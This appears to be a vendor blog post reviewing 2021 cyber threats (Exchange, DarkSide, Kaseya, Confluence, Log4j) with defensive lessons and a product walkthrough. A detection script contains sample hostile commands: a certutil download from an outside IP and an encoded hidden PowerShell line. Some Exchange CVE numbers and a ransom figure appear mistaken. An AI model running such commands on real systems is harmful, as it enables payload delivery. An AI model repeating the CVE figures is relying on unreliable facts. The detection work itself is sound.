10 Lessons Learned from the Top Cyber Threats of 2021


2021 was a busy year for the cyber security community. Emerging threats posed many challenges to security professionals and created many opportunities for threat actors. Picus has curated a list of the top five threats observed in 2021, detailing ten lessons defenders can learn from them. 

Microsoft Exchange Server Vulnerabilities

In January 2021, Volexity detected a large amount of egress data traffic on its customers’ Microsoft Exchange Servers [1]. Later, it discovered that several vulnerabilities had been exploited for unauthorized data exfiltration by an APT group called HAFNIUM. In March 2021, Microsoft released several updates to patch zero day vulnerabilities found in Microsoft Exchange Server affecting versions 2010, 2013, 2016 and 2019 [2]. Details of the vulnerabilities are provided below:

CVE Number       Vulnerability Type      CVSS Score
CVE-2021-26885   Remote Code Execution   9.8 (Critical)
CVE-2021-26887   Remote Code Execution   7.8 (High)
CVE-2021-26888   Remote Code Execution   7.8 (High)
CVE-2021-27065   Remote Code Execution   7.8 (High)

Exploitation of these vulnerabilities affected 250,000 servers around the world [3].

At Picus, we published a detailed blog post about the Tactics, Techniques, and Procedures (TTPs) used by HAFNIUM to target Microsoft Exchange Servers.

Lessons learned:

1. Continuously check your network traffic for anomalies

Vendors’ response times to vulnerabilities can be longer than expected. Although exploitation of these vulnerabilities was first reported in January, Microsoft released patches in March. Organizations that waited for a patch would have been exposed to exploitation for nearly 2 months. Therefore, network traffic should be monitored at all times and analysed for unusual activity.

2. Perform threat hunting after patching

In the case of the Microsoft Exchange Server vulnerabilities listed above, the patches were effective in remediating the vulnerabilities and blocking new exploitation attempts. However, threat actors retained unauthorized access to servers that had been exploited before patching. Therefore, it is important to perform threat hunting and to assume that vulnerabilities may have been exploited before the patch was applied. Check for leftover artifacts of the threat actors and make sure to remove any malicious files from your network.

DarkSide Ransomware Campaign

The DarkSide ransomware group provided Ransomware as a Service (RaaS) to other threat actors. According to Elliptic, this campaign extorted over 80 million USD in 2021 [4]. Most notably, US-based Colonial Pipeline Company paid 4.4 million USD after its operations were brought to a halt by this ransomware campaign in May 2021. After the ransom was paid, the pipeline slowly regained its operational capabilities.

We published a whitepaper about the Tactics, Techniques, and Procedures (TTPs) and the tools utilized by the DarkSide threat actors.

Lessons Learned:

3. Practice risk management for the worst case event

When ransomware threat actors infect critical infrastructure, they hold both the company and its customers hostage. When Colonial Pipeline Company was hit by ransomware, fuel shortages occurred across the US and some airports could not provide fuel to airlines. This was one of the worst case scenarios for the company and for society. Practicing risk management for assets is important to estimate and understand the possible outcomes of a cyber attack.

4. Implement behaviour-based detection

Ransomware is evolving and mostly uses legitimate tools that organizations have already whitelisted. Therefore, signature-based detection falls short against it. Behavior-based detection and proactive approaches such as attack simulation and security control validation become more important each day.

This lesson is also a key recommendation from Picus Labs to help detect and respond to the techniques identified in the Red Report 2021.

See Picus in Action

Watch how you can easily simulate DarkSide ransomware to assess your security posture and prevent it with signatures for your WAF, IPS, and NGFW.

13 steps

1. Let's look at DarkSide ransomware attacks in the Picus Threat Library. To see the Threat Library, click on Threats.

2. The Picus Threat Library includes five main threat categories. Ransomware is classified under the Malicious Code category. Click on Ransomware to list the ransomware attacks in the library.

3. The latest ransomware simulations are listed here. To search for DarkSide ransomware, click the search bar.

4. To search by the name of any ransomware, type the name in the search bar and press enter.

5. Click on Name in the drop-down menu.

6. Type Darkside in the search bar and press enter.

7. Click the highlighted icon to run the search in the Picus Threat Library.

8. The Picus Threat Library includes multiple Darkside variants. Let's look into Variant-10 by clicking on it. This opens the threat details for the selected ransomware.

9. Under the Overview tab, the file details are available. Let's click Assess to go to the assessment screen.

10. Under the Assess tab, you can run the ransomware simulation any time you want. Click on Assess to run the simulation for DarkSide ransomware Variant-10.

11. The assessment is finished and the result is "Blocked", as indicated by the green icon. If the result was not blocked, don't worry: Picus also provides prevention signatures from security vendors. Let's click the Prevention tab to see these signatures.

12. Vendor signatures for IPS, WAF and NGFW that prevent the simulated attack can be found under the Prevention tab.

13. With a few clicks, we quickly simulated DarkSide ransomware attacks and obtained prevention signatures.

Request your free Picus demo to test your security controls against ransomware attacks now!

Here's an interactive tutorial:

https://www.iorad.com/player/1898700/Darkside-Ransomware-Tutorial-w--audio

Kaseya MSP Supply Chain Attack

In July 2021, the REvil ransomware group (also known as Sodinokibi) launched an attack campaign against Managed Service Providers (MSPs) and thousands of their customers. Like the Solarwinds attack in 2020, the Kaseya MSP attack was a supply chain attack, delivered through a Kaseya VSA Agent Hot-fix. According to Reuters, the attack affected between 800 and 1500 businesses around the world [5]. REvil demanded 70 million USD for a universal decryptor; however, the website of the ransomware group disappeared some time later. Due to the size of the attack, the amount of ransom collected is unknown. Kaseya later released a universal decryptor for the victims.

Click here to learn more about the Tactics, Techniques, and Procedures (TTPs) used by REvil in the Kaseya MSP Supply-Chain Attack.

Lessons Learned:

5. Adopt a zero trust strategy

It is nearly impossible to defend your assets against zero-day vulnerabilities in widely used services. However, by adopting a zero trust architecture in your network, which limits the access of threat actors to network assets, it is possible to significantly reduce the effects of attacks and any damage that may occur.

6. Monitor use of built-in operating system utilities

Adversaries prefer to abuse built-in tools in their attack campaigns. For example, REvil used numerous living off the land (LOL) utilities, such as PowerShell, certutil.exe, and MsMpEng.exe, to conduct the Kaseya attack campaign.

The increased prevalence of this type of adversary behavior is also a key finding of the Red Report 2021. According to the report, attackers predominantly use built-in legitimate utilities to perform all the top 10 techniques, revealing adversaries' preference for abusing legitimate tools rather than custom ones.

You need to monitor the use of the known living off the land binaries and scripts (LOLBAS) to identify their malicious use [6].
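As an added example (not Picus code) of the monitoring this lesson calls for, the Python below applies a few process-creation rules to constructed Sysmon-style events for the three utilities named above: certutil.exe download or decode switches, encoded or hidden PowerShell, and MsMpEng.exe running outside its expected install path (the expected-path prefixes are an assumption).

```python
"""Flag suspicious use of living-off-the-land binaries in process-creation events.
Added example, not Picus code. Event fields mimic Sysmon Event ID 1; the events in
SAMPLE_EVENTS are constructed, not real telemetry."""
import re

# Where the Defender engine normally lives; MsMpEng.exe started from anywhere else
# deserves a look (assumption: these two prefixes cover normal deployments).
MSMPENG_PREFIXES = ("c:\\programdata\\microsoft\\windows defender\\platform\\",
                    "c:\\program files\\windows defender\\")
RULES = [  # (rule name, image basename, pattern applied to the command line)
    ("certutil_download_or_decode", "certutil.exe",
     re.compile(r"-(urlcache|decode|encode)\b", re.I)),
    ("powershell_encoded_or_hidden", "powershell.exe",
     re.compile(r"-(enc|encodedcommand|w(indowstyle)?\s+hidden)\b", re.I)),
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Return the names of all rules that fire for one event."""
    hits = []
    image = basename(ev["image"])
    for name, binary, pattern in RULES:
        if image == binary and pattern.search(ev["cmdline"]):
            hits.append(name)
    # Legitimate binary relocated to an unexpected path: the command line looks
    # benign, so only the image path gives it away.
    if image == "msmpeng.exe" and not ev["image"].lower().startswith(MSMPENG_PREFIXES):
        hits.append("msmpeng_unexpected_path")
    return hits

def scan(events):
    """Map event index -> fired rules, keeping only events with at least one hit."""
    return {i: h for i, ev in enumerate(events) if (h := check_event(ev))}

SAMPLE_EVENTS = [  # constructed sample telemetry
    {"image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://192.0.2.10/agent.bin agent.bin"},
    {"image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -verify C:\\certs\\server.cer"},
    {"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc <base64-placeholder>"},
    {"image": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2111.5-0\\MsMpEng.exe",
     "cmdline": "MsMpEng.exe"},
    {"image": "C:\\Users\\Public\\MsMpEng.exe", "cmdline": "MsMpEng.exe"},
]
```

Running scan(SAMPLE_EVENTS) flags events 0, 2 and 4 and leaves the legitimate certutil -verify call and the Defender engine in its normal location alone.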

Atlassian Confluence Remote Code Execution Vulnerability

In August 2021, a remote code execution vulnerability with a CVSS score of 9.8 (critical) was disclosed by Atlassian. This vulnerability affected Atlassian Confluence Server and Confluence Data Center versions prior to 6.13.23, 7.4.11, 7.11.6, 7.12.5 and 7.13.0. US-CERT and CISA warned about mass exploitation of the vulnerability, urging organizations to apply the necessary updates [7]. It was mostly exploited by crypto-mining malware.

Lessons Learned:

7. Maintain strict supervision of your public-facing applications

Public-facing applications are an attractive place to gain initial access to any network, and threat actors often exploit vulnerabilities in these services. When a critical vulnerability is found in a public-facing service, it is often used as the entry point for mass exploitation and lateral movement. The traffic received by these services should be kept in check, and security controls such as NGFW and WAF should be properly set up and validated.

8. Test the effectiveness of your security controls

Investing in security control devices does not provide complete assurance that your important assets are secure. Policy weaknesses and misconfigurations can create gaps for attackers to exploit, so regularly test your controls to ensure that they are deployed correctly and tuned to defend against the latest threats. After applying a patch or a configuration change, test that the affected devices are working as intended.

Apache Log4j Vulnerabilities

In December 2021, four vulnerabilities were disclosed in the Apache Log4j library. Details of vulnerabilities are given below:

CVE Number       Vulnerability Type      CVSS Score
CVE-2021-44228   Remote Code Execution   10.0 (Critical)
CVE-2021-45046   Remote Code Execution   9.0 (Critical)
CVE-2021-45105   Denial of Service       7.5 (High)
CVE-2021-44832   Remote Code Execution   6.6 (Medium)

This library is downloaded millions of times and the number of applications that use the Log4j library is unknown. According to Microsoft Threat Intelligence Center (MSTIC), multiple APT groups are exploiting Log4j vulnerabilities [8].

Lessons Learned:

9. Improve visibility of your software inventory

It is hard to pinpoint assets with vulnerable Log4j libraries. Even if your organization does not use Log4j directly in any of its assets, 3rd party services may have used it without disclosing this information. Improve supply chain transparency and keep track of 3rd party assets and their components.
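As an added example (not Picus code) of the inventory visibility this lesson asks for, the Python below locates log4j-core copies on disk by reading the Maven pom.properties inside each jar, and also descends into jars bundled inside other archives, which is where third-party software most often hides a copy; build_sample() creates a constructed directory tree for the run.

```python
"""Inventory log4j-core copies on disk, including jars nested inside other jars, wars
or ears. Added example, not Picus code; build_sample() creates a constructed tree."""
import io, os, pathlib, re, tempfile, zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
BASELINE = (2, 17, 1)  # 2.17.1 closed CVE-2021-44832, the last of the four CVEs

def scan_archive(data, label, found):
    """Recurse through one archive held in memory, appending (label, version) hits."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if POM_PROPS in names:  # this archive itself is log4j-core
            m = re.search(rb"^version=(\d+)\.(\d+)\.(\d+)", zf.read(POM_PROPS), re.M)
            found.append((label, tuple(map(int, m.groups())) if m else None))
        for name in names:  # shaded/fat jars carry log4j-core as a nested jar
            if name.lower().endswith(ARCHIVE_EXT):
                scan_archive(zf.read(name), f"{label}!{name}", found)

def inventory(root):
    """Walk root; return [(archive path, possibly with !nested suffix, version or None)]."""
    found = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    scan_archive(fh.read(), os.path.relpath(path, root), found)
    return found

def needs_review(version):
    return version is None or version < BASELINE  # unknown or pre-2.17.1

def _jar(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in entries.items():
            zf.writestr(name, body)
    return buf.getvalue()

def build_sample():
    """Constructed tree: log4j-core 2.17.1 under lib/, plus an app.jar bundling 2.14.1."""
    root = pathlib.Path(tempfile.mkdtemp())
    (root / "lib").mkdir()
    (root / "lib" / "log4j-core-2.17.1.jar").write_bytes(_jar({POM_PROPS: "version=2.17.1\n"}))
    nested = _jar({POM_PROPS: "version=2.14.1\n"})
    (root / "app.jar").write_bytes(_jar({"BOOT-INF/lib/log4j-core-2.14.1.jar": nested}))
    return str(root)
```

inventory(build_sample()) reports both copies, and needs_review() singles out the 2.14.1 buried inside app.jar, which a filename-only search of the lib/ directory would have missed.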

10. Better utilize security controls

Due to the widespread use of Log4j, vulnerable assets can be anywhere, and patching them might be out of your hands, especially for 3rd party assets. While waiting for other vendors to patch their vulnerable assets, validate your security controls and test your security posture.

Check out this video, where we explain the four key steps to reduce your risk and how the Picus platform can help you optimize your security controls to prevent exploitation of Log4j.


References

[1] “Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities.” [Online]. Available: https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/.

[2] MSRC Team, “On-Premises Exchange Server Vulnerabilities Resource Center – updated March 25, 2021.” [Online]. Available: https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/.

[3] H. Murphy, “Microsoft hack escalates as criminal groups rush to exploit flaws,” Financial Times, 09-Mar-2021. [Online]. Available: https://www.ft.com/content/74fa3de6-dd16-4dc5-9b69-38bde634adc3.

[4] T. Robinson, “DarkSide Ransomware has Netted Over $90 million in Bitcoin.” [Online]. Available: https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin.

[5] R. Satter, “Up to 1,500 businesses affected by ransomware attack, U.S. firm’s CEO says,” Reuters, 05-Jul-2021. [Online]. Available: https://www.reuters.com/technology/hackers-demand-70-million-liberate-data-held-by-companies-hit-mass-cyberattack-2021-07-05/.

[6] “LOLBAS.” [Online]. Available: https://lolbas-project.github.io.

[7] “Atlassian Releases Security Updates for Confluence Server and Data Center.” [Online]. Available: https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data.

[8] Microsoft 365 Defender Threat Intelligence Team and Microsoft Threat Intelligence Center (MSTIC), “Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability,” 12-Dec-2021. [Online]. Available: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/.